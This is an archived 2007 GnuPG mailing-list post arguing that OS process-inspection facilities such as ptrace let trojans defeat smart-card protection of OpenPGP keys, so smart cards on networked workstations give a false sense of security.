Old PC as Hardware Security Module?

Zeljko Vrba zvrba at globalnet.hr
Mon May 14 16:21:54 CEST 2007

"Robert J. Hansen" <rjh at sixdemonbag.org> writes:

>> What prevents the keylogger in your first example to snarf the PIN  
>> code
>> for the OpenPGP card and send decryption requests to the OpenPGP card,
>> using the PIN code, in the background, possibly remotely controlled  
>> over
>> the network?
> There exist cryptographic smart cards you can actually be safe  
> against this kind of attack with.  They're pretty cool.  I don't know
Smart-card has nothing to do with it.  It's the OS who has to defend against
such type of attack.  AFAIK, no wide-spread OS does it today.  On linux, you
can strace any application and see all I/O done by the program.  On Windows
you have even more powerful debugging/interception API.  Windows is slightly
better here because an administrator can revoke the "Debug Privilege" from a
user account.  Thus, the user can't debug its own programs, but neither the
trojans can, so it makes running sensitive applications slightly safer.

As long as OS allows ptrace/equivalent calls which inspect and modify data and
code in another process, there's NO WAY to prevent this attack.  Not even
separate PIN entry device helps, because the trojan may still attach itself to
(eg.)  GnuPG executable and modify data (eg. to-be signed hash) in memory
before it's sent to the smart-card.

Intel had once a whitepaper on LaGrande technology where every application
would be cryptographically protected *in hardware* from any other application.
Each app would have cryptographically protected channel with I/O devices,
and even memory regions.  Such environment would fully protect applications
like GnuPG.  But, AFAIK, it remained only a whitepaper.

> The question isn't whether smart cards are secure--nothing that's got  
> that much RAM and processor power ever is--but whether smart cards  
> are a security improvement.
My personal opinion is that, at the current state of "security" in today's
OS-es, smart cards give just a false sense of security in typical usage
scenarios (= when used on a general-purpose, networked workstation).

More information about the Gnupg-users mailing list